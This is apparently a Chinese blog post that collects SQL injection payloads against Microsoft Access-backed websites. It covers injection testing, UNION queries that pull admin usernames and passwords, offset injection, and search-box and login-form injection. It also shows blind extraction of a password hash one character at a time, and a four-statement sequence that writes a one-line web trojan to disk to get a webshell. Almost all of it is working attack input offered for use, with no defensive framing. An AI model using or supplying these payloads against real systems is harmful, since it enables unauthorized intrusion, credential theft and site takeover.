• access注入大全


     access注入 access偏移注入 access搜索型注入 access登陆框注入

    1.判断注入.

    and 1=1
    and 1=2
    或者
    -0
    -1 看页面的变化

    2. access注入.

    联合查询
    order by 10
    and 1=2 union select 1,2,3,4,5,6,7,8,9,10 from admin
    and 1=2 union select 1,username,3,4,password,6,7,8,9,10 from admin

    3. access偏移注入. 条件须有id字段

    order by 13
    and 1=2 union select 1,2,3,4,5,6,7,8,9,* from admin 直到*正常

    13-9=4 4*2=8 13-8=5
    and 1=2 union select 1,2,3,4,5,* from (admin as a inner join admin as b on a.id=b.id)


    4. access爆字段

    select * from next where id=1 ORDER BY sum(1)
    只能爆出一个字段 如为 bm_username 就可以猜其他的了

    还可以通过网站后台 查看源代码查找字段

    5 .access搜索型注入

    2010%'and(select count(*)from mssysaccessobjects)>0 and '%'=' //返回正常。access数据库
    2010%'and(select count(*)from admin)>0 and '%'=' //返回正常存 在admin表
    2010%'and(select count(username)from admin)>0 and '%'=' //返回正常,存在username字段
    2010%'and(select count(password)from admin)>0 and '%'=' //返回正常,并且存在password字段
    2010%'and(select top 1 len(username)from admin)>4 and '%'=' //返回正常username长度大于4
    2010%'and(select top 1 len(username)from admin)=5 and '%'=' //返回正常username长度等于5
    2010%'and(select top 1 len(password)from admin)=32 and '%'=' //返回正常,密码长度为32位加密。

    username length 5
    password length 32

    2010%'and(select top 1 asc(mid(username,1,1))from admin)=97 and '%'=' //a
    以下都是对应位置的ascii的编码,如果不是则返回错误。
    2010%'and(select top 1 asc(mid(password,1,1))from admin)=48 and '%'=',
    2010%'and(select top 1 asc(mid(password,2,1))from admin)=102 and '%'='
    2010%'and(select top 1 asc(mid(password,3,1))from admin)=101 and '%'='
    2010%'and(select top 1 asc(mid(password,4,1))from admin)=102 and '%'='

    这个查询太费时间了 可以试下union联合查询
    2010%' order by 10 and '%'='
    2010%' and 1=2 union select 1,2,3,4,5,6,7,8,9,10 from admin and '%'='
    2010%'and 1=2 union select 1,username,3,4,password,6,7,8,9,10 from admin and '%'='


    6. access登陆框注入

    1. a' or(select count(*) from admin)>0 and '1'='1
    2. a' or(select count(username) from admin)>0 and '1'='1
    3. a' or(select count(password) from admin)>0 and '1'='1

    这个查询太费时间了 可以试下union联合查询

    a' union select 1,2,3,4,5,6,7,8,9,10 from admin and '1'='1
    a' union select 1,username,3,4,password,6,7,8,9,10 from admin and '1'='1


    7.ACCESS执行SQL语句导出一句话拿webshell

    第一句代码
    1.create table cmd (a varchar(50))
    第二句代码
    1.insert into cmd (a) values ('一句话木马')
    第三句代码
    1.select * into [a] in 'e:hostweb2011ok.asp;ok.xls' 'excel 4.0;' from cmd
    第四句代码
    1.drop table cmd

  • 相关阅读:
    hdu 3037 Saving Beans fzu 2020 组合 hit 2813 Garden visiting hrbeu 组合数 fzu 1564 Combination
    PKU 2429 GCD & LCM Inverse
    Discrete Logging hunnu10590 pku2417 fzu 1352 hit 1928 zoj 1898
    HDUBased Game Theory
    Perfect Pth Powers zoj 2124 pku1730 hunnu10585
    More Divisors zoj 2562
    服务器的安全配置技巧总结
    sql server中datetime字段只取年月日如20060421,默认值如何设置?getdate()得到的是包含时分秒的时间
    获取当前打印机的名称、驱动程序、打印端口信息
    如何使用Delphi设计强大的服务器程序
  • 原文地址:https://www.cnblogs.com/spadd/p/4085350.html
Copyright © 2020-2023  润新知